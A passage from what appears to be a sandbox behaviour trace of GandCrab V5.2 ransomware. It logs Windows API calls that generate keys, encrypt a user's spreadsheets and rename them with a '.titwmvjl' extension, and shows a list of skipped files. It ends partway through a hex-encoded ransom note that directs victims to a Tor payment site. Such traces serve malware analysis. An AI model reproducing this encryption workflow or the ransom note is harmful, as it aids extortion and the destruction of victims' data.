dwParam=0x8, pbData=0x259f38c, pdwDataLen=0x259f390, dwFlags=0x0 | out: pbData=0x259f38c*=0x800, pdwDataLen=0x259f390*=0x4) returned 1 [0092.075] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.075] CryptEncrypt (in: hKey=0x5034f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259f3c4*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259f3c4*=0x100) returned 1 [0092.075] GetLastError () returned 0x0 [0092.075] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.075] CryptDestroyKey (hKey=0x5034f8) returned 1 [0092.075] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.075] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0092.075] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.076] CryptAcquireContextW (in: phProv=0x259f394, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f394*=0x4c9980) returned 1 [0092.076] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.076] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f398 | out: phKey=0x259f398*=0x5033b8) returned 1 [0092.076] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.076] CryptGetKeyParam (in: hKey=0x5033b8, dwParam=0x8, pbData=0x259f38c, pdwDataLen=0x259f390, dwFlags=0x0 | out: pbData=0x259f38c*=0x800, pdwDataLen=0x259f390*=0x4) returned 1 [0092.076] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.076] CryptEncrypt (in: hKey=0x5033b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259f3c4*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259f3c4*=0x100) returned 1 [0092.077] GetLastError () returned 0x0 [0092.077] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.077] CryptDestroyKey (hKey=0x5033b8) returned 1 [0092.077] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.077] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0092.077] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0092.077] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0092.077] ReadFile (in: hFile=0x2ac, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259f470, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259f470*=0xcde0, lpOverlapped=0x0) returned 1 [0092.090] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0xffff3220, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.091] WriteFile (in: hFile=0x2ac, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xcde0, lpNumberOfBytesWritten=0x259f454, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259f454*=0xcde0, lpOverlapped=0x0) returned 1 [0092.092] WriteFile (in: hFile=0x2ac, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259f454, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259f454*=0x21c, lpOverlapped=0x0) returned 1 [0092.093] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.096] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.097] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.097] CloseHandle (hObject=0x2ac) returned 1 [0092.097] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\XvytobGD.xls" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\xvytobgd.xls"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\XvytobGD.xls.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\xvytobgd.xls.titwmvjl"), dwFlags=0x1) returned 1 [0092.098] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.098] FindNextFileW (in: hFindFile=0x503578, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0092.098] lstrcmpW (lpString1="Z7ACw4QJjvpy.xlsx", lpString2=".") returned 1 [0092.098] lstrcmpW (lpString1="Z7ACw4QJjvpy.xlsx", lpString2="..") returned 1 [0092.098] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\", lpString2="Z7ACw4QJjvpy.xlsx" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\Z7ACw4QJjvpy.xlsx") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\Z7ACw4QJjvpy.xlsx" [0092.098] lstrlenW (lpString=".titwmvjl") returned 9 [0092.098] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\Z7ACw4QJjvpy.xlsx") returned 49 [0092.098] VirtualAlloc (lpAddress=0x0, dwSize=0xa2, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0092.098] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\Z7ACw4QJjvpy.xlsx.titwmvjl") returned 58 [0092.099] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\Z7ACw4QJjvpy.xlsx") returned 49 [0092.099] lstrlenW (lpString=".xlsx") returned 5 [0092.099] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0092.099] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".xlsx ") returned 6 [0092.099] lstrcmpiW (lpString1=".xlsx", lpString2=".titwmvjl") returned 1 [0092.099] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.099] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\Z7ACw4QJjvpy.xlsx") returned 49 [0092.099] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\Z7ACw4QJjvpy.xlsx") returned 49 [0092.099] lstrcmpiW (lpString1="Z7ACw4QJjvpy.xlsx", lpString2="desktop.ini") returned 1 [0092.099] lstrcmpiW (lpString1="Z7ACw4QJjvpy.xlsx", lpString2="autorun.inf") returned 1 [0092.099] lstrcmpiW (lpString1="Z7ACw4QJjvpy.xlsx", lpString2="ntuser.dat") returned 1 [0092.099] lstrcmpiW (lpString1="Z7ACw4QJjvpy.xlsx", lpString2="iconcache.db") returned 1 [0092.099] lstrcmpiW (lpString1="Z7ACw4QJjvpy.xlsx", lpString2="bootsect.bak") returned 1 [0092.099] lstrcmpiW (lpString1="Z7ACw4QJjvpy.xlsx", lpString2="boot.ini") returned 1 [0092.099] lstrcmpiW (lpString1="Z7ACw4QJjvpy.xlsx", lpString2="ntuser.dat.log") returned 1 [0092.099] lstrcmpiW (lpString1="Z7ACw4QJjvpy.xlsx", lpString2="thumbs.db") returned 1 [0092.099] lstrcmpiW (lpString1="Z7ACw4QJjvpy.xlsx", lpString2="TITWMVJL-DECRYPT.txt") returned 1 [0092.099] lstrcmpiW (lpString1="Z7ACw4QJjvpy.xlsx", lpString2="TITWMVJL-DECRYPT.html") returned 1 [0092.099] lstrcmpiW (lpString1="Z7ACw4QJjvpy.xlsx", lpString2="KRAB-DECRYPT.html") returned 1 [0092.099] lstrcmpiW (lpString1="Z7ACw4QJjvpy.xlsx", lpString2="CRAB-DECRYPT.html") returned 1 [0092.099] lstrcmpiW (lpString1="Z7ACw4QJjvpy.xlsx", lpString2="KRAB-DECRYPT.txt") returned 1 [0092.099] lstrcmpiW (lpString1="Z7ACw4QJjvpy.xlsx", lpString2="CRAB-DECRYPT.txt") returned 1 [0092.099] lstrcmpiW (lpString1="Z7ACw4QJjvpy.xlsx", lpString2="ntldr") returned 1 [0092.099] lstrcmpiW (lpString1="Z7ACw4QJjvpy.xlsx", lpString2="NTDETECT.COM") returned 1 [0092.099] lstrcmpiW (lpString1="Z7ACw4QJjvpy.xlsx", lpString2="Bootfont.bin") returned 1 [0092.099] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\Z7ACw4QJjvpy.xlsx") returned 49 [0092.099] lstrlenW (lpString=".xlsx") returned 5 [0092.099] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0092.100] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".xlsx ") returned 6 [0092.100] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.100] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0092.100] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\Z7ACw4QJjvpy.xlsx" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\z7acw4qjjvpy.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2ac [0092.100] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.100] ReadFile (in: hFile=0x2ac, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259f470, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259f470*=0x21c, lpOverlapped=0x0) returned 1 [0092.101] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.101] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.101] CryptAcquireContextW (in: phProv=0x259f3a0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f3a0*=0x4c9980) returned 1 [0092.102] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0092.102] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0092.102] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0092.102] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259f42c | out: pbBuffer=0x259f42c) returned 1 [0092.102] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.102] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0092.102] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.102] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.102] CryptAcquireContextW (in: phProv=0x259f3a0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f3a0*=0x4c9980) returned 1 [0092.103] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0092.103] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0092.103] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0092.103] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259f44c | out: pbBuffer=0x259f44c) returned 1 [0092.103] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.103] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0092.103] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.104] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.104] CryptAcquireContextW (in: phProv=0x259f394, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f394*=0x4c9980) returned 1 [0092.104] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.104] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f398 | out: phKey=0x259f398*=0x5038f8) returned 1 [0092.104] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.104] CryptGetKeyParam (in: hKey=0x5038f8, dwParam=0x8, pbData=0x259f38c, pdwDataLen=0x259f390, dwFlags=0x0 | out: pbData=0x259f38c*=0x800, pdwDataLen=0x259f390*=0x4) returned 1 [0092.104] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.104] CryptEncrypt (in: hKey=0x5038f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259f3c4*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259f3c4*=0x100) returned 1 [0092.105] GetLastError () returned 0x0 [0092.105] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.105] CryptDestroyKey (hKey=0x5038f8) returned 1 [0092.105] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.105] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0092.105] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.106] CryptAcquireContextW (in: phProv=0x259f394, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f394*=0x4c9980) returned 1 [0092.106] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.106] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f398 | out: phKey=0x259f398*=0x5033b8) returned 1 [0092.107] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.107] CryptGetKeyParam (in: hKey=0x5033b8, dwParam=0x8, pbData=0x259f38c, pdwDataLen=0x259f390, dwFlags=0x0 | out: pbData=0x259f38c*=0x800, pdwDataLen=0x259f390*=0x4) returned 1 [0092.107] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.107] CryptEncrypt (in: hKey=0x5033b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259f3c4*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259f3c4*=0x100) returned 1 [0092.107] GetLastError () returned 0x0 [0092.107] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.107] CryptDestroyKey (hKey=0x5033b8) returned 1 [0092.107] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.107] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0092.107] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0092.108] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0092.108] ReadFile (in: hFile=0x2ac, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259f470, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259f470*=0xd114, lpOverlapped=0x0) returned 1 [0092.122] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0xffff2eec, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.123] WriteFile (in: hFile=0x2ac, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xd114, lpNumberOfBytesWritten=0x259f454, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259f454*=0xd114, lpOverlapped=0x0) returned 1 [0092.124] WriteFile (in: hFile=0x2ac, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259f454, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259f454*=0x21c, lpOverlapped=0x0) returned 1 [0092.126] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.131] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.131] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.131] CloseHandle (hObject=0x2ac) returned 1 [0092.132] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\Z7ACw4QJjvpy.xlsx" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\z7acw4qjjvpy.xlsx"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\Z7ACw4QJjvpy.xlsx.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\z7acw4qjjvpy.xlsx.titwmvjl"), dwFlags=0x1) returned 1 [0092.133] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.133] FindNextFileW (in: hFindFile=0x503578, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 0 [0092.133] FindClose (in: hFindFile=0x503578 | out: hFindFile=0x503578) returned 1 [0092.134] CloseHandle (hObject=0x230) returned 1 [0092.134] FindNextFileW (in: hFindFile=0x503678, lpFindFileData=0x259f7b8 | out: lpFindFileData=0x259f7b8) returned 1 [0092.134] lstrcmpW (lpString1="Downloads", lpString2=".") returned 1 [0092.134] lstrcmpW (lpString1="Downloads", lpString2="..") returned 1 [0092.134] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\", lpString2="Downloads" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Downloads") returned="C:\\Users\\CIiHmnxMn6Ps\\Downloads" [0092.134] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Downloads", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Downloads\\") returned="C:\\Users\\CIiHmnxMn6Ps\\Downloads\\" [0092.134] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x1e70000 [0092.134] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0092.135] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0092.140] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0092.140] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0092.140] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0092.140] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0092.140] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0092.141] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0092.141] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.141] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0092.141] wsprintfW (in: param_1=0x1e70200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Downloads\\\\TITWMVJL-DECRYPT.txt") returned 53 [0092.141] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Downloads\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\downloads\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x230 [0092.142] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54